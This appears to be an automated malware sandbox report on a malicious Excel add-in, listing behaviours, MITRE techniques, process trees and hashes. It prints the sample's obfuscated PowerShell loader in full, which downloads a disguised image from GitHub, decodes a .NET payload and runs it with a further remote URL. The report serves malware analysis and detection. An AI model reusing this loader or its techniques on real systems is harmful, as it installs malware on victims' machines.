Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
61s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
13/10/2024, 01:58
Static task
static1
Behavioral task
behavioral1
Sample
f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086.xlam
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086.xlam
Resource
win10v2004-20241007-en
General
-
Target
f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086.xlam
-
Size
736KB
-
MD5
7c34b23b4b7cb66c2393128c3f55a0e1
-
SHA1
2cf918f985476c7d3988b7d2ac530d32c59de12d
-
SHA256
f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086
-
SHA512
cd2d8d1f2e3accb677bed9be2a335253240458babedb514d88f31e980ed2740ebe586463fecf06ce5e3670ac430b1c54faf48732d29a98abeca28dae9daf537b
-
SSDEEP
12288:4gDGK/3uJ3WSZvFsxoHXYo1NmcCYlnjeRKZLImngMVTGckDI:jqKg35DHoojmcCEnjeyLImnLVTv
Malware Config
Extracted
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2872 EQNEDT32.EXE 6 2772 powershell.exe 7 2772 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2772 powershell.exe 2868 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 6 raw.githubusercontent.com 7 raw.githubusercontent.com 5 raw.githubusercontent.com -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2872 EQNEDT32.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2256 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2868 powershell.exe 2772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2868 powershell.exe Token: SeDebugPrivilege 2772 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2872 wrote to memory of 2932 2872 EQNEDT32.EXE 31 PID 2872 wrote to memory of 2932 2872 EQNEDT32.EXE 31 PID 2872 wrote to memory of 2932 2872 EQNEDT32.EXE 31 PID 2872 wrote to memory of 2932 2872 EQNEDT32.EXE 31 PID 2932 wrote to memory of 2868 2932 WScript.exe 32 PID 2932 wrote to memory of 2868 2932 WScript.exe 32 PID 2932 wrote to memory of 2868 2932 WScript.exe 32 PID 2932 wrote to memory of 2868 2932 WScript.exe 32 PID 2868 wrote to memory of 2772 2868 powershell.exe 34 PID 2868 wrote to memory of 2772 2868 powershell.exe 34 PID 2868 wrote to memory of 2772 2868 powershell.exe 34 PID 2868 wrote to memory of 2772 2868 powershell.exe 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086.xlam1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2256
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mediciniiiiiffredating.vbs"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd5akxpbWFnZVVybCA9IFlxTGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZWFkcy9tYWluL0RldGFoTm90ZV9WLmpwZyBZcUw7eWpMd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWUnKydudDt5akxpbWFnZUInKyd5dGVzID0geWpMd2ViQ2xpZW50LkRvd25sb2FkRGF0YSh5akxpbWFnZVVybCk7eWpMaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoeWpMaW1hZ2VCeXRlcyk7eWonKydMc3QnKydhcnRGbGFnID0gWXFMPDxCQVNFNjRfU1RBUlQnKyc+PllxTDt5akxlbmRGbGFnID0gWXFMPDxCQVNFNjRfRU5EPj5ZcUw7eWpMc3RhcnRJbmRleCA9IHlqTGltYWdlVGV4dC5JbmRleE9mKHknKydqTHN0YXJ0RmxhZyk7eWpMZW5kSW5kZXggPSB5akxpbWFnZVRleHQuSW5kZXhPZih5akxlbmRGbGFnKTt5akxzdGFydEluZGV4IC1nZSAwIC1hbmQgeWpMZScrJ25kSScrJ25kZXggLWd0IHlqTHN0YXJ0SW5kZXg7eWpMcycrJ3RhcnRJbmRleCArPSB5akxzdGFydEZsYWcnKycuTGVuZ3RoO3lqTGJhc2U2NExlbmd0aCA9IHlqTGVuZEluZGV4IC0geWpMc3RhcnRJbmRleDt5akxiYXNlNjRDb21tYW5kID0geWpMaW1hZ2VUZXh0LlN1YnN0cmluZyh5akxzdGEnKydydEluZGV4LCB5akxiYXNlNjRMZW5ndGgnKycpO3lqTGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNicrJzRTdHJpbmcoeWonKydMYmFzJysnZTY0Q29tbWFuZCk7eWpMbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHlqTGNvJysnbW1hbmRCeXRlcyk7eWpMdmFpTScrJ2V0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChZcUxWQUlZcUwpO3lqTHZhaU1ldGhvZC5JbnZva2UoJysneWpMbnVsbCwgJysnQChZcUx0eHQuNDQ0NDZlc2EnKydiJysnYmJiYmJld21hZGFtLzQzMS44NzEuNjQuODkxLy86cHR0aFlxTCwgWXFMZGVzYXRpdmFkb1lxTCwgWXFMZGVzYXRpdmFkb1lxTCwgWXFMZGVzYXRpdmFkb1lxTCwgWXFMQWRkSW5Qcm9jZXNzMzJZcUwsIFlxTGRlc2F0aXZhZG9ZcUwsIFlxTGRlc2F0aXZhZG9ZcUwpKTsnKS5SZVBsYUNFKCd5akwnLCckJykuUmVQbGFDRSgnWXFMJyxbc3RSSU5HXVtDaEFyXTM5KSB8IGlleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('yjLimageUrl = YqLhttps://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg YqL;yjLwebClient = New-Object System.Net.WebClie'+'nt;yjLimageB'+'ytes = yjLwebClient.DownloadData(yjLimageUrl);yjLimageText = [System.Text.Encoding]::UTF8.GetString(yjLimageBytes);yj'+'Lst'+'artFlag = YqL<<BASE64_START'+'>>YqL;yjLendFlag = YqL<<BASE64_END>>YqL;yjLstartIndex = yjLimageText.IndexOf(y'+'jLstartFlag);yjLendIndex = yjLimageText.IndexOf(yjLendFlag);yjLstartIndex -ge 0 -and yjLe'+'ndI'+'ndex -gt yjLstartIndex;yjLs'+'tartIndex += yjLstartFlag'+'.Length;yjLbase64Length = yjLendIndex - yjLstartIndex;yjLbase64Command = yjLimageText.Substring(yjLsta'+'rtIndex, yjLbase64Length'+');yjLcommandBytes = [System.Convert]::FromBase6'+'4String(yj'+'Lbas'+'e64Command);yjLloadedAssembly = [System.Reflection.Assembly]::Load(yjLco'+'mmandBytes);yjLvaiM'+'ethod = [dnlib.IO.Home].GetMethod(YqLVAIYqL);yjLvaiMethod.Invoke('+'yjLnull, '+'@(YqLtxt.44446esa'+'b'+'bbbbbewmadam/431.871.64.891//:ptthYqL, YqLdesativadoYqL, YqLdesativadoYqL, YqLdesativadoYqL, YqLAddInProcess32YqL, YqLdesativadoYqL, YqLdesativadoYqL));').RePlaCE('yjL','$').RePlaCE('YqL',[stRING][ChAr]39) | iex"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD553143954570c9507ef372f2506c56772
SHA1aed624cca6e5ff06c8eded5d06bd5d84db3c7c64
SHA2563568d8a5e8d5e26d16aaed26195aeee24cafb9b867de69d521f23336200641c0
SHA512afce48ff53df539214002df623598bc961b42242ec1ab0778d2df1caf6b46a8cd75512628cc0e61370bb20a68ea85be7bda6447e9c7210ddda493b5be46d7554
-
Filesize
189KB
MD5ba21082c47f33b42f6243198bea92684
SHA1d0a7314525f30708cffd5273feb1fc24ff33523c
SHA2566be117567324f1c1db4f2cbf48a25a3eaa24904238a37ab3b5e49b6970078b65
SHA512dc21e6b490cb9f1b262622c28da8d8ce087bf1357b3f939f2e4fbe5339cd647045b4c89aeeb2543097b4b688643fead1547de59583659c16c5a8d0d530e54217